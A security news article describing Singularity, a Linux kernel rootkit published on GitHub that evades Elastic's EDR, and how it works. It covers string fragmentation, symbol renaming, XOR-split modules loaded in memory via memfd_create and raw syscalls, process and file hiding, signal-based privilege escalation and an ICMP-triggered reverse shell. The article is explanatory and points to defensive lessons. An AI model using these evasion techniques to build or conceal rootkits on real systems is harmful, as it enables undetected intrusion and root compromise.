Security researchers have developed a sophisticated Linux rootkit named Singularity that bypasses Elastic Security's endpoint detection and response mechanisms. The tool demonstrates vulnerabilities in static and behavioral detection systems through advanced obfuscation techniques. Unveiled on GitHub by researcher 0xMatheuZ, it highlights ongoing challenges in kernel-level threat identification.
Security researchers, led by the pseudonym 0xMatheuZ, have released Singularity, a Linux kernel rootkit on GitHub, designed to evade detection by Elastic Security's EDR solution, known as Elastic Defend. Typically, Elastic Security triggers more than 26 alerts for standard rootkit implementations, including file quarantines and process terminations, but Singularity circumvents these through four primary evasion strategies.
The first technique involves compile-time string obfuscation, where sensitive strings like “GPL” and “kallsyms_lookup_name” are fragmented into separate constants, such as MODULE_LICENSE(“G” “P” “L”), which the C compiler concatenates. This prevents YARA signature scanners from identifying contiguous malicious strings in the binary while preserving functionality.
Second, symbol name randomization replaces predictable patterns, such as “hook_getdents,” “fake_tcp4_seq_show,” and “hide_module,” with kernel-like generic names prefixed by “sys,” “kern,” or “dev.” A whitelist protects essential kernel APIs, and regex patterns ensure consistent renaming without errors.
Third, module fragmentation splits the compiled .ko file into 64KB XOR-encoded segments using a randomized 16-byte key. These reassemble in memory via a custom loader and memfd_create, avoiding disk artifacts for static analysis. Loading occurs through direct syscalls with inline assembly, bypassing monitored libc wrappers, supporting both 64-bit and 32-bit systems via int $0x80.
Fourth, ftrace helper functions like “fh_install_hook” and “fh_remove_hook” are renamed to randomized identifiers, evading rules that flag multiple such occurrences.
Singularity also includes functionalities to hide processes from the /proc filesystem, obscure files and directories matching “singularity” or “matheuz,” mask TCP connections on port 8081, and enable privilege escalation via custom signals or environment variables. It features an ICMP-based backdoor for reverse shells triggered by specific packet sequences, with anti-analysis measures that obstruct tracing and sanitize logs.
For behavioral evasion, it deploys a staged bash script to /singularity, executed with clean command lines to avoid reverse shell detection. The script uses kill -59 for PID hiding and escalation, compiling loaders in /tmp rather than monitored directories. In tests, Singularity loaded without alerts, hid processes, and established root shells.
This research exposes weaknesses in signature-based and behavioral detection for kernel threats, emphasizing the need for continuous updates, kernel integrity monitoring, memory forensics, and defense-in-depth strategies combining multiple approaches.